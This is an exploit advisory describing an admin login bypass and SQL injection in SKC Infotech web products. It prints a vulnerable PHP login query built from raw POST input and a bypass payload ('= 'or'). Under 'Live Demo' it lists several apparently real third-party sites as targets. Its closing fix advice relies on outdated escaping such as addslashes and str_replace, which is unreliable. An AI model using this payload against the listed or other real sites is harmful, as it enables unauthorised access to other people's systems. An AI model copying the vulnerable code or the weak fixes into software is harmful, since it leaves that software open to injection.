# Exploit Title : SKC Infotech Admin Bypass & SQL Injection Vulnerability
# Discovered By : MrHoudini
# Contact Me : Mr.Houdini77@Gmail.com
# Date : 08-02-2024
# Vendor Homepage : https://skcinfotech.in
[!] Description.:
SQL injection attacks usually targets database and all of them are the results of programming errors.
If programmer couldn't checked the inputs correctly, so the attacker can send his/her commands to database.
If programmer do this errors at admin page input and the inputs haven't been checked correctly,
occur a very bad thing that allow attacker login to administrator panel
with combination the passwords that turn the result to True in php.
Request Method :
[+] POST
Vulnerable Module:
[+] Login
Vulnerable Parameter:
[+](username) and (Password)
==================================================
[!] Bug.........:
<?php
require_once('any.php');
if($_POST['submit'])
{
$user=$_POST['user'];
$pswd=$_POST['pswd'];
$result=mysql_query("select * from login where user='$user' and pswd='$pswd'");
$rowcount=mysql_num_rows($result);
if($rowcount>0)
{
header('Location:any.php');
}
else
{
echo "bad user";
}
}
?>
==================================================
[!] PoC.........:
To bypass the admin login: '= 'or'
==================================================
[!] Live Demo. For Admin Page :
https://accountsassociate.in/admin/
https://sangitabiotech.com/admin/
Url Target Admin Panel : http://site.com/admin/
[!] Live Demo. For SQL Injection :
https://sangitabiotech.com/product.php?prod_id=22
https://sbdschess.in/gallery.php?menu=5
==================================================
[!] Solution...:
PHP functions can be averted with the bug
Check input variable:
--ctype_digit
--ctype_alnum
And other ctype & gettype family functions
*String entries with the database functions
--mysql_real_escape_string or sqlite_escape_string or ....
-If functions are not available in the database
--str_replace , addslashes